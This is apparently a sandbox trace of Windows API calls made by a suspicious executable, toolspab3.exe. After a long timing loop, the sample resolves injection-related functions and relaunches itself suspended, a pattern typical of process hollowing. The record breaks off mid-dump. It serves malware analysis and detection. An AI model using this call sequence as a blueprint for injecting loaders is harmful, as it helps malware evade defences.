SetLastError (dwErrCode=0x0) [0059.522] GetTickCount () returned 0x1d3b054 [0059.522] SetLastError (dwErrCode=0x0) [0059.522] GetTickCount () returned 0x1d3b054 [0059.522] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.523] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.523] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.523] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.523] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.523] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.523] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.523] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.523] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.523] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.523] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.523] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.523] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.523] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.523] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.523] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.523] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.523] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.523] SetLastError (dwErrCode=0x0) [0059.523] GetTickCount () returned 0x1d3b064 [0059.524] SetLastError (dwErrCode=0x0) [0059.524] GetTickCount () returned 0x1d3b064 [0059.524] SetLastError (dwErrCode=0x0) [0059.524] GetTickCount () returned 0x1d3b064 [0059.524] SetLastError (dwErrCode=0x0) [0059.524] GetTickCount () returned 0x1d3b064 [0059.524] SetLastError (dwErrCode=0x0) [0059.524] GetTickCount () returned 0x1d3b064 [0059.524] SetLastError (dwErrCode=0x0) [0059.524] GetTickCount () returned 0x1d3b064 [0059.524] SetLastError (dwErrCode=0x0) [0059.524] GetTickCount () returned 0x1d3b064 [0059.524] SetLastError (dwErrCode=0x0) [0059.524] GetTickCount () returned 0x1d3b064 [0059.524] SetLastError (dwErrCode=0x0) [0059.524] GetTickCount () returned 0x1d3b064 [0059.524] SetLastError (dwErrCode=0x0) [0059.524] GetTickCount () returned 0x1d3b064 [0059.524] SetLastError (dwErrCode=0x0) [0059.524] GetTickCount () returned 0x1d3b064 [0059.524] SetLastError (dwErrCode=0x0) [0059.524] GetTickCount () returned 0x1d3b064 [0059.524] SetLastError (dwErrCode=0x0) [0059.524] GetTickCount () returned 0x1d3b064 [0059.524] SetLastError (dwErrCode=0x0) [0059.524] GetTickCount () returned 0x1d3b064 [0059.524] SetLastError (dwErrCode=0x0) [0059.524] GetTickCount () returned 0x1d3b064 [0059.524] SetLastError (dwErrCode=0x0) [0059.524] GetTickCount () returned 0x1d3b064 [0059.524] SetLastError (dwErrCode=0x0) [0059.524] GetTickCount () returned 0x1d3b064 [0059.524] SetLastError (dwErrCode=0x0) [0059.525] GetTickCount () returned 0x1d3b064 [0059.525] SetLastError (dwErrCode=0x0) [0059.525] GetTickCount () returned 0x1d3b064 [0059.525] SetLastError (dwErrCode=0x0) [0059.525] GetTickCount () returned 0x1d3b064 [0059.525] SetLastError (dwErrCode=0x0) [0059.525] GetTickCount () returned 0x1d3b064 [0059.525] SetLastError (dwErrCode=0x0) [0059.525] GetTickCount () returned 0x1d3b064 [0059.525] SetLastError (dwErrCode=0x0) [0059.525] GetTickCount () returned 0x1d3b064 [0059.525] SetLastError (dwErrCode=0x0) [0059.525] GetTickCount () returned 0x1d3b064 [0059.525] SetLastError (dwErrCode=0x0) [0059.525] GetTickCount () returned 0x1d3b064 [0059.525] SetLastError (dwErrCode=0x0) [0059.525] GetTickCount () returned 0x1d3b064 [0059.525] SetLastError (dwErrCode=0x0) [0059.525] GetTickCount () returned 0x1d3b064 [0059.525] SetLastError (dwErrCode=0x0) [0059.525] GetTickCount () returned 0x1d3b064 [0059.525] SetLastError (dwErrCode=0x0) [0059.525] GetTickCount () returned 0x1d3b064 [0059.525] SetLastError (dwErrCode=0x0) [0059.525] GetTickCount () returned 0x1d3b064 [0059.525] SetLastError (dwErrCode=0x0) [0059.525] GetTickCount () returned 0x1d3b064 [0059.525] SetLastError (dwErrCode=0x0) [0059.525] GetTickCount () returned 0x1d3b064 [0059.525] SetLastError (dwErrCode=0x0) [0059.525] GetTickCount () returned 0x1d3b064 [0059.525] SetLastError (dwErrCode=0x0) [0059.525] GetTickCount () returned 0x1d3b064 [0059.525] SetLastError (dwErrCode=0x0) [0059.526] GetTickCount () returned 0x1d3b064 [0059.526] SetLastError (dwErrCode=0x0) [0059.526] GetTickCount () returned 0x1d3b064 [0059.526] SetLastError (dwErrCode=0x0) [0059.526] GetTickCount () returned 0x1d3b064 [0059.526] SetLastError (dwErrCode=0x0) [0059.526] GetTickCount () returned 0x1d3b064 [0059.526] SetLastError (dwErrCode=0x0) [0059.526] GetTickCount () returned 0x1d3b064 [0059.526] SetLastError (dwErrCode=0x0) [0059.526] GetTickCount () returned 0x1d3b064 [0059.526] SetLastError (dwErrCode=0x0) [0059.526] GetTickCount () returned 0x1d3b064 [0059.526] SetLastError (dwErrCode=0x0) [0059.526] GetTickCount () returned 0x1d3b064 [0059.526] SetLastError (dwErrCode=0x0) [0059.526] GetTickCount () returned 0x1d3b064 [0059.526] SetLastError (dwErrCode=0x0) [0059.526] GetTickCount () returned 0x1d3b064 [0059.526] SetLastError (dwErrCode=0x0) [0059.526] GetTickCount () returned 0x1d3b064 [0059.526] SetLastError (dwErrCode=0x0) [0059.526] GetTickCount () returned 0x1d3b064 [0059.526] SetLastError (dwErrCode=0x0) [0059.526] GetTickCount () returned 0x1d3b064 [0059.526] SetLastError (dwErrCode=0x0) [0059.526] GetTickCount () returned 0x1d3b064 [0059.526] SetLastError (dwErrCode=0x0) [0059.526] GetTickCount () returned 0x1d3b064 [0059.526] SetLastError (dwErrCode=0x0) [0059.526] GetTickCount () returned 0x1d3b064 [0059.526] SetLastError (dwErrCode=0x0) [0059.526] GetTickCount () returned 0x1d3b064 [0059.526] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.527] GetTickCount () returned 0x1d3b064 [0059.527] SetLastError (dwErrCode=0x0) [0059.528] GetTickCount () returned 0x1d3b064 [0059.528] SetLastError (dwErrCode=0x0) [0059.528] GetTickCount () returned 0x1d3b064 [0059.528] SetLastError (dwErrCode=0x0) [0059.528] GetTickCount () returned 0x1d3b064 [0059.528] SetLastError (dwErrCode=0x0) [0059.528] GetTickCount () returned 0x1d3b064 [0059.528] SetLastError (dwErrCode=0x0) [0059.528] GetTickCount () returned 0x1d3b064 [0059.528] SetLastError (dwErrCode=0x0) [0059.528] GetTickCount () returned 0x1d3b064 [0059.528] SetLastError (dwErrCode=0x0) [0059.528] GetTickCount () returned 0x1d3b064 [0059.528] SetLastError (dwErrCode=0x0) [0059.528] GetTickCount () returned 0x1d3b064 [0059.528] SetLastError (dwErrCode=0x0) [0059.528] GetTickCount () returned 0x1d3b064 [0059.528] SetLastError (dwErrCode=0x0) [0059.528] GetTickCount () returned 0x1d3b064 [0059.528] SetLastError (dwErrCode=0x0) [0059.528] GetTickCount () returned 0x1d3b064 [0059.528] SetLastError (dwErrCode=0x0) [0059.528] GetTickCount () returned 0x1d3b064 [0059.528] SetLastError (dwErrCode=0x0) [0059.528] GetTickCount () returned 0x1d3b064 [0059.528] SetLastError (dwErrCode=0x0) [0059.528] GetTickCount () returned 0x1d3b064 [0059.528] SetLastError (dwErrCode=0x0) [0059.528] GetTickCount () returned 0x1d3b064 [0059.528] SetLastError (dwErrCode=0x0) [0059.528] GetTickCount () returned 0x1d3b064 [0059.528] SetLastError (dwErrCode=0x0) [0059.528] GetTickCount () returned 0x1d3b064 [0059.529] SetLastError (dwErrCode=0x0) [0059.529] GetTickCount () returned 0x1d3b064 [0059.529] SetLastError (dwErrCode=0x0) [0059.529] GetTickCount () returned 0x1d3b064 [0059.529] SetLastError (dwErrCode=0x0) [0059.529] GetTickCount () returned 0x1d3b064 [0059.529] SetLastError (dwErrCode=0x0) [0059.529] GetTickCount () returned 0x1d3b064 [0059.529] SetLastError (dwErrCode=0x0) [0059.529] GetTickCount () returned 0x1d3b064 [0059.529] SetLastError (dwErrCode=0x0) [0059.529] GetTickCount () returned 0x1d3b064 [0059.529] SetLastError (dwErrCode=0x0) [0059.529] GetTickCount () returned 0x1d3b064 [0059.529] SetLastError (dwErrCode=0x0) [0059.529] GetTickCount () returned 0x1d3b064 [0059.529] SetLastError (dwErrCode=0x0) [0059.529] GetTickCount () returned 0x1d3b064 [0059.529] SetLastError (dwErrCode=0x0) [0059.529] GetTickCount () returned 0x1d3b064 [0059.529] SetLastError (dwErrCode=0x0) [0059.529] GetTickCount () returned 0x1d3b064 [0059.529] SetLastError (dwErrCode=0x0) [0059.529] GetTickCount () returned 0x1d3b064 [0059.529] SetLastError (dwErrCode=0x0) [0059.529] GetTickCount () returned 0x1d3b064 [0059.529] SetLastError (dwErrCode=0x0) [0059.529] GetTickCount () returned 0x1d3b064 [0059.529] SetLastError (dwErrCode=0x0) [0059.529] GetTickCount () returned 0x1d3b064 [0059.529] SetLastError (dwErrCode=0x0) [0059.529] GetTickCount () returned 0x1d3b064 [0059.530] SetLastError (dwErrCode=0x0) [0059.530] GetTickCount () returned 0x1d3b064 [0059.530] SetLastError (dwErrCode=0x0) [0059.530] GetTickCount () returned 0x1d3b064 [0059.530] SetLastError (dwErrCode=0x0) [0059.530] GetTickCount () returned 0x1d3b064 [0059.530] SetLastError (dwErrCode=0x0) [0059.530] GetTickCount () returned 0x1d3b064 [0059.530] SetLastError (dwErrCode=0x0) [0059.530] GetTickCount () returned 0x1d3b064 [0059.530] SetLastError (dwErrCode=0x0) [0059.530] GetTickCount () returned 0x1d3b064 [0059.530] SetLastError (dwErrCode=0x0) [0059.530] GetTickCount () returned 0x1d3b064 [0059.530] SetLastError (dwErrCode=0x0) [0059.530] GetTickCount () returned 0x1d3b064 [0059.530] SetLastError (dwErrCode=0x0) [0059.530] GetTickCount () returned 0x1d3b064 [0059.530] SetLastError (dwErrCode=0x0) [0059.530] GetTickCount () returned 0x1d3b064 [0059.530] SetLastError (dwErrCode=0x0) [0059.530] GetTickCount () returned 0x1d3b064 [0059.530] SetLastError (dwErrCode=0x0) [0059.530] GetTickCount () returned 0x1d3b064 [0059.530] SetLastError (dwErrCode=0x0) [0059.530] GetTickCount () returned 0x1d3b064 [0059.530] SetLastError (dwErrCode=0x0) [0059.530] GetTickCount () returned 0x1d3b064 [0059.530] SetLastError (dwErrCode=0x0) [0059.530] GetTickCount () returned 0x1d3b064 [0059.530] SetLastError (dwErrCode=0x0) [0059.530] GetTickCount () returned 0x1d3b064 [0059.531] SetLastError (dwErrCode=0x0) [0059.531] GetTickCount () returned 0x1d3b064 [0059.531] SetLastError (dwErrCode=0x0) [0059.531] GetTickCount () returned 0x1d3b064 [0059.531] SetLastError (dwErrCode=0x0) [0059.531] GetTickCount () returned 0x1d3b064 [0059.531] SetLastError (dwErrCode=0x0) [0059.531] GetTickCount () returned 0x1d3b064 [0059.531] SetLastError (dwErrCode=0x0) [0059.531] GetTickCount () returned 0x1d3b064 [0059.531] SetLastError (dwErrCode=0x0) [0059.531] GetTickCount () returned 0x1d3b064 [0059.531] SetLastError (dwErrCode=0x0) [0059.531] GetTickCount () returned 0x1d3b064 [0059.531] SetLastError (dwErrCode=0x0) [0059.531] GetTickCount () returned 0x1d3b064 [0059.531] SetLastError (dwErrCode=0x0) [0059.531] GetTickCount () returned 0x1d3b064 [0059.531] SetLastError (dwErrCode=0x0) [0059.531] GetTickCount () returned 0x1d3b064 [0059.531] SetLastError (dwErrCode=0x0) [0059.531] GetTickCount () returned 0x1d3b064 [0059.531] SetLastError (dwErrCode=0x0) [0059.531] GetTickCount () returned 0x1d3b064 [0059.531] SetLastError (dwErrCode=0x0) [0059.531] GetTickCount () returned 0x1d3b064 [0059.531] SetLastError (dwErrCode=0x0) [0059.531] GetTickCount () returned 0x1d3b064 [0059.531] SetLastError (dwErrCode=0x0) [0059.531] GetTickCount () returned 0x1d3b064 [0059.531] SetLastError (dwErrCode=0x0) [0059.531] GetTickCount () returned 0x1d3b064 [0059.531] SetLastError (dwErrCode=0x0) [0059.532] GetTickCount () returned 0x1d3b064 [0059.532] SetLastError (dwErrCode=0x0) [0059.532] GetTickCount () returned 0x1d3b064 [0059.532] SetLastError (dwErrCode=0x0) [0059.532] GetTickCount () returned 0x1d3b064 [0059.532] SetLastError (dwErrCode=0x0) [0059.532] GetTickCount () returned 0x1d3b064 [0059.532] SetLastError (dwErrCode=0x0) [0059.532] GetTickCount () returned 0x1d3b064 [0059.532] SetLastError (dwErrCode=0x0) [0059.532] GetTickCount () returned 0x1d3b064 [0059.532] SetLastError (dwErrCode=0x0) [0059.532] GetTickCount () returned 0x1d3b064 [0059.532] SetLastError (dwErrCode=0x0) [0059.532] GetTickCount () returned 0x1d3b064 [0059.532] SetLastError (dwErrCode=0x0) [0059.532] GetTickCount () returned 0x1d3b064 [0059.532] SetLastError (dwErrCode=0x0) [0059.532] GetTickCount () returned 0x1d3b064 [0059.532] SetLastError (dwErrCode=0x0) [0059.532] GetTickCount () returned 0x1d3b064 [0059.532] SetLastError (dwErrCode=0x0) [0059.532] GetTickCount () returned 0x1d3b064 [0059.532] SetLastError (dwErrCode=0x0) [0059.532] GetTickCount () returned 0x1d3b064 [0059.532] SetLastError (dwErrCode=0x0) [0059.532] GetTickCount () returned 0x1d3b064 [0059.532] SetLastError (dwErrCode=0x0) [0059.532] GetTickCount () returned 0x1d3b064 [0059.532] SetLastError (dwErrCode=0x0) [0059.532] GetTickCount () returned 0x1d3b064 [0059.532] SetLastError (dwErrCode=0x0) [0059.533] GetTickCount () returned 0x1d3b064 [0059.533] SetLastError (dwErrCode=0x0) [0059.533] GetTickCount () returned 0x1d3b064 [0059.533] SetLastError (dwErrCode=0x0) [0059.533] GetTickCount () returned 0x1d3b064 [0059.533] SetLastError (dwErrCode=0x0) [0059.533] GetTickCount () returned 0x1d3b064 [0059.533] SetLastError (dwErrCode=0x0) [0059.533] GetTickCount () returned 0x1d3b064 [0059.533] SetLastError (dwErrCode=0x0) [0059.533] GetTickCount () returned 0x1d3b064 [0059.533] SetLastError (dwErrCode=0x0) [0059.533] GetTickCount () returned 0x1d3b064 [0059.533] SetLastError (dwErrCode=0x0) [0059.533] GetTickCount () returned 0x1d3b064 [0059.533] SetLastError (dwErrCode=0x0) [0059.533] GetTickCount () returned 0x1d3b064 [0059.533] SetLastError (dwErrCode=0x0) [0059.533] GetTickCount () returned 0x1d3b064 [0059.533] SetLastError (dwErrCode=0x0) [0059.533] GetTickCount () returned 0x1d3b064 [0059.533] SetLastError (dwErrCode=0x0) [0059.533] GetTickCount () returned 0x1d3b064 [0059.533] SetLastError (dwErrCode=0x0) [0059.533] GetTickCount () returned 0x1d3b064 [0059.533] SetLastError (dwErrCode=0x0) [0059.533] GetTickCount () returned 0x1d3b064 [0059.533] SetLastError (dwErrCode=0x0) [0059.533] GetTickCount () returned 0x1d3b064 [0059.533] SetLastError (dwErrCode=0x0) [0059.533] GetTickCount () returned 0x1d3b064 [0059.533] SetLastError (dwErrCode=0x0) [0059.534] GetTickCount () returned 0x1d3b064 [0059.534] SetLastError (dwErrCode=0x0) [0059.534] GetTickCount () returned 0x1d3b064 [0059.534] SetLastError (dwErrCode=0x0) [0059.534] GetTickCount () returned 0x1d3b064 [0059.534] SetLastError (dwErrCode=0x0) [0059.534] GetTickCount () returned 0x1d3b064 [0059.534] SetLastError (dwErrCode=0x0) [0059.534] GetTickCount () returned 0x1d3b064 [0059.534] SetLastError (dwErrCode=0x0) [0059.534] GetTickCount () returned 0x1d3b064 [0059.534] SetLastError (dwErrCode=0x0) [0059.534] GetTickCount () returned 0x1d3b064 [0059.534] SetLastError (dwErrCode=0x0) [0059.589] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0059.589] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalAlloc") returned 0x769c5846 [0059.589] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0059.589] GetProcAddress (hModule=0x769b0000, lpProcName="Sleep") returned 0x769c10ff [0059.590] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0059.590] GetProcAddress (hModule=0x769b0000, lpProcName="CreateToolhelp32Snapshot") returned 0x769e7327 [0059.590] GetProcAddress (hModule=0x769b0000, lpProcName="Module32First") returned 0x76a46279 [0059.590] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0059.590] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x30 [0059.592] Module32First (hSnapshot=0x30, lpme=0x18c36c) returned 1 [0059.593] VirtualAlloc (lpAddress=0x0, dwSize=0x89a0, flAllocationType=0x1000, flProtect=0x40) returned 0x20000 [0059.595] LoadLibraryA (lpLibFileName="user32") returned 0x773b0000 [0065.235] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0065.235] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageExtraInfo") returned 0x773eed76 [0065.235] LoadLibraryA (lpLibFileName="kernel32") returned 0x769b0000 [0065.235] GetProcAddress (hModule=0x769b0000, lpProcName="WinExec") returned 0x76a43051 [0065.235] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0065.236] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0065.236] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0065.236] GetProcAddress (hModule=0x769b0000, lpProcName="CreateProcessA") returned 0x769c1072 [0065.236] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadContext") returned 0x769e799c [0065.236] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0065.236] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAllocEx") returned 0x769dd980 [0065.236] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0065.236] GetProcAddress (hModule=0x769b0000, lpProcName="ReadProcessMemory") returned 0x769dcfa4 [0065.236] GetProcAddress (hModule=0x769b0000, lpProcName="WriteProcessMemory") returned 0x769dd9b0 [0065.236] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadContext") returned 0x76a45933 [0065.236] GetProcAddress (hModule=0x769b0000, lpProcName="ResumeThread") returned 0x769c43a7 [0065.236] GetProcAddress (hModule=0x769b0000, lpProcName="WaitForSingleObject") returned 0x769c1136 [0065.236] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0065.236] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineA") returned 0x769c5159 [0065.236] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x779e0000 [0065.237] GetProcAddress (hModule=0x779e0000, lpProcName="NtUnmapViewOfSection") returned 0x779ffc70 [0065.237] GetProcAddress (hModule=0x779e0000, lpProcName="NtWriteVirtualMemory") returned 0x779ffe04 [0065.237] GetProcAddress (hModule=0x773b0000, lpProcName="RegisterClassExA") returned 0x773cdb98 [0065.237] GetProcAddress (hModule=0x773b0000, lpProcName="CreateWindowExA") returned 0x773cd22e [0065.237] GetProcAddress (hModule=0x773b0000, lpProcName="PostMessageA") returned 0x773d3baa [0065.237] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageA") returned 0x773c7bd3 [0065.237] GetProcAddress (hModule=0x773b0000, lpProcName="DefWindowProcA") returned 0x77a224e0 [0065.237] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileAttributesA") returned 0x769c53cc [0065.237] GetProcAddress (hModule=0x769b0000, lpProcName="GetStartupInfoA") returned 0x769c0e00 [0065.237] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualProtectEx") returned 0x76a44b5f [0065.237] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0065.238] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0065.239] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0065.239] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0065.239] RegisterClassExA (param_1=0x18c028) returned 0x34c1ba [0065.240] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x40146 [0066.108] PostMessageA (hWnd=0x40146, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0066.108] GetMessageA (in: lpMsg=0x18c058, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18c058) returned 1 [0066.108] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0066.109] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x220000, nSize=0x2800 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\toolspab3.exe")) returned 0x28 [0066.109] GetStartupInfoA (in: lpStartupInfo=0x18bf7c | out: lpStartupInfo=0x18bf7c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0066.109] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe\" " [0066.109] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe", lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18bf7c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x18bfd4 | out: lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe\" ", lpProcessInformation=0x18bfd4*(hProcess=0x78, hThread=0x74, dwProcessId=0xe58, dwThreadId=0xe5c)) returned 1 [0066.128] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.129] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0066.129] GetThreadContext (in: hThread=0x74, lpContext=0x220000 | out: lpContext=0x220000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x423db0, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, 